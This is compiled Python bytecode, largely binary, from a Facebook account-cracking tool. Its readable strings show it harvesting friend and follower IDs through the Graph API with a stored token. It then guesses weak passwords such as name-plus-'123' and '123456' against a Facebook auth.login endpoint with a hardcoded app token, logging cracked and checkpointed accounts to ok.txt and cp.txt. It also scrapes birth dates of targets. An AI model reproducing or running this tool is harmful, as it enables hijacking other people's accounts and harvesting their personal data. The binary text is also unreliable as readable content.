0|\x00\x00d\x1e\x00k\x02\x00r\xaa\x03t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1f\x00t\x14\x00\x17d \x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d!\x00t\x17\x00t\x18\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x19\x00j\x1a\x00d"\x00\x83\x01\x00\x01d#\x00GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d&\x00\x86\x00\x00}\n\x00t\x1b\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1c\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x11\x00GHd$\x00d%\x00\x14GHd\x04\x00GHd(\x00GHd)\x00t\x17\x00t\x18\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x17\x00t\x18\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GHt\x00\x00d+\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x16\x00\x00\x00\x1b[1;93mPut Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x15\x00\x00\x00\x1b[1;93mTarget user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00t\x01\x00\x00\x00|R\r\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x15\x00\x00\x00\x1b[1;92mPut Id/user : R.\x00\x00\x00s\x0e\x00\x00\x00Target user : s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000t\x01\x00\x00\x003t\x01\x00\x00\x004t\x01\x00\x00\x005t\x01\x00\x00\x006s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s:\x00\x00\x00\x1b[1;94mSILAHKAN DI TUNGGU process is running in 
backgroundi/\x00\x00\x00t\x01\x00\x00\x00-c\x01\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sE\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\x1c\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x00d\t\x00GHd\n\x00t\x07\x00d\x0b\x00\x19\x17GHd\x0c\x00|\x01\x00\x17GHd\r\x00|\x04\x00\x17d\x0e\x00\x17GHt\x08\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00d\x11\x00|\x01\x00\x17d\x12\x00\x17|\x04\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01nf\x06d\x13\x00|\x06\x00k\x06\x00r\x18\x01d\x14\x00GHd\x15\x00t\x07\x00d\x0b\x00\x19\x17GHd\x16\x00|\x01\x00\x17GHd\x17\x00|\x04\x00\x17d\x0e\x00\x17GH\x88\x01\x00j\x0b\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\x1e\x06|\x03\x00d\x18\x00\x17}\x08\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xbc\x01d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nz\x05d\x13\x00|\x06\x00k\x06\x00r\x1f\x02d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x17\x05|\x03\x00d\x1f\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xc3\x02d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ns\x04d\x13\x00|\x06\x00k\x06\x00r&\x03d 
\x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x10\x04|\x03\x00d!\x00\x17}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xca\x03d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nl\x03d\x13\x00|\x06\x00k\x06\x00r-\x04d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\t\x03d"\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xcd\x04d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ni\x02d\x13\x00|\x06\x00k\x06\x00r0\x05d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x06\x02d#\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x05d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nf\x01d\x13\x00|\x06\x00k\x06\x00r3\x06d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x03\x01d$\x00}\x0f\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0f\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd3\x06d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nc\x00d\x13\x00|\x06\x00k\x06\x00r6\x07d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR@\x00\x00\x00t\x03\x00\x00\x001
23s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=vi_vn&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705cR.\x00\x00\x00s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x96] \x1b[1;93mCEKPOINTs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93mR\x17\x00\x00\x00s-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;93ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93ms\x01\x00\x00\x00\ns\x10\x00\x00\x00out/super_cp.txtt\x01\x00\x00\x00as\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x0c\x00\x00\x00access_tokens\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mBERHASILs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92mt\x04\x00\x00\x001234s\x11\x00\x00\x00\x1b[1;93m[RAKA-CP] s\x03\x00\x00\x00 | s\x06\x00\x00\x00cp.txts\x18\x00\x00\x00\x1b[1;92m[RAKA-OK] \x1b[1;30ms\x06\x00\x00\x00\x1b[1;0ms\x06\x00\x00\x00ok.txtt\x05\x00\x00\x0012345s\x19\x00\x00\x00 \x1b[1;92m[RAKA-OK] \x1b[1;30mt\x06\x00\x00\x00123456t\x06\x00\x00\x00223344t\x06\x00\x00\x00334455t\x06\x00\x00\x00445566(\x0c\x00\x00\x00t\x05\x00\x00\x00splitR\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00bR\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x06\x00\x00\x00append(\x10\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userR7\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00pass1R*\x00\x00\x00t\x01\x00\x00\x00dt\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x02\x00\x00\x00cpR?\x00\x00\x00t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7(\x02\x00\x00\x00t\x03\x00\x00\x00cpst\x03\x00\x00\x00oks(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main$\x01\x00\x00s\xe0\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01(\x01\x0f\x01\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\r\x02\x0c\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x15\x00\x00\x00\x1b[1;93mTotal Cp/Ok : t\x01\x00\x00\x00/s\x1b\x00\x00\x00\x1b[1;93mPress enter to back (\x1d\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x0f\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00t\n\x00\x00\x00view_tokent\x0b\x00\x00\x00extract_dobR\x0b\x00\x00\x00t\x06\x00\x00\x00logoutR\x12\x00\x00\x00R\x13\x00\x00\x00R=\x00\x00\x00t\x03\x00\x00\x00strt\x03\x00\x00\x00lenR"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00map(\x0c\x00\x00\x00t\x06\x00\x00\x00selectR4\x00\x00\x00t\x03\x00\x00\x00idtR)\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00iR7\x00\x00\x00t\x02\x00\x00\x00naR+\x00\x00\x00Ra\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R=\x00\x00\x00\xc6\x00\x00\x00s\xce\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x03\x12\x80\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sO\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x02\x00GHt\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mLogged In Token \x1b[0;97ms\t\x00\x00\x00 Token : s\x11\x00\x00\x00cat .fb_token.txts\x1a\x00\x00\x00 Press enter to main menu (\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rc\x00\x00\x00\xb0\x01\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sQ\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHt\x05\x00d\x05\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x06\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0b\x00\x00\x00Logout Menus&\x00\x00\x00\x1b[1;93mDo you really want to logout ? 
s\x14\x00\x00\x00rm -rf .fb_token.txt(\x07\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x0b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Re\x00\x00\x00\xbb\x01\x00\x00s\x10\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\n\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x9a\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x05\x00GHt\r\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00Extract DOB Of IDs\x1f\x00\x00\x00\x1b[1;93m[1] Grab from friendlists\x1e\x00\x00\x00\x1b[1;93m[2] Grab from followerss\x19\x00\x00\x00\x1b[1;93m[3] Grab single ids\x0f\x00\x00\x00\x1b[1;93m[4] Back(\x0e\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00t\n\x00\x00\x00dob_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc4\x01\x00\x00s \x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s~\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00rV\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn5\x00\x04t\x0b\x00k\n\x00r\xce\x00\x01\x01\x01d\x04\x00GHd\x0c\x00t\x0c\x00\x17GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\xc7\x01|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\r\x01Wnv\x01|\x00\x00d\x14\x00k\x02\x00r\x8a\x02t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x15\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\x16\x00|\x04\x00d\x0b\x00\x19\x17GHWn\'\x00\x04t\x0b\x00k\n\x00r\xfe\x01\x01\x01\x01d\x17\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x18\x00\x17t\x06\x00\x17d\x19\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\x93\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x0
7\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qA\x02WnB\x00|\x00\x00d\x1a\x00k\x02\x00r\xa0\x02t\x10\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x1b\x00k\x02\x00r\xb6\x02t\x11\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x1c\x00GHd\x04\x00GHt\r\x00\x83\x00\x00\x01d\x1d\x00t\x12\x00t\x13\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1e\x00GHd\x1f\x00GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GH\x87\x00\x00f\x01\x00d"\x00\x86\x00\x00}\n\x00t\x14\x00d#\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHd$\x00GHd%\x00t\x12\x00t\x13\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHt\x00\x00d&\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00Ns\x14\x00\x00\x00\n Choose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s+\x00\x00\x00\t \x1b[1;32mGrab DOB From Friendlist\x1b[0;97ms\x0f\x00\x00\x00 Put Id/user : s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00s\x0c\x00\x00\x00Target Id : R\x17\x00\x00\x00s\x13\x00\x00\x00\x1b[1;31mID Not Founds\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s&\x00\x00\x00\x1b[1;32m Grab DOB From Followers\x1b[0;97ms\x0e\x00\x00\x00Target user : s\x1f\x00\x00\x00\t \x1b[1;31mID Not Found\x1b[0;97ms\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s&\x00\x00\x00\t \x1b[1;31mSelect valid option\x1b[0;97ms\x14\x00\x00\x00\x1b[1;93mTotal ID : s\x1e\x00\x00\x00\x1b[1;93mThe Process has starteds&\x00\x00\x00\x1b[1;93mNote : This is for testing 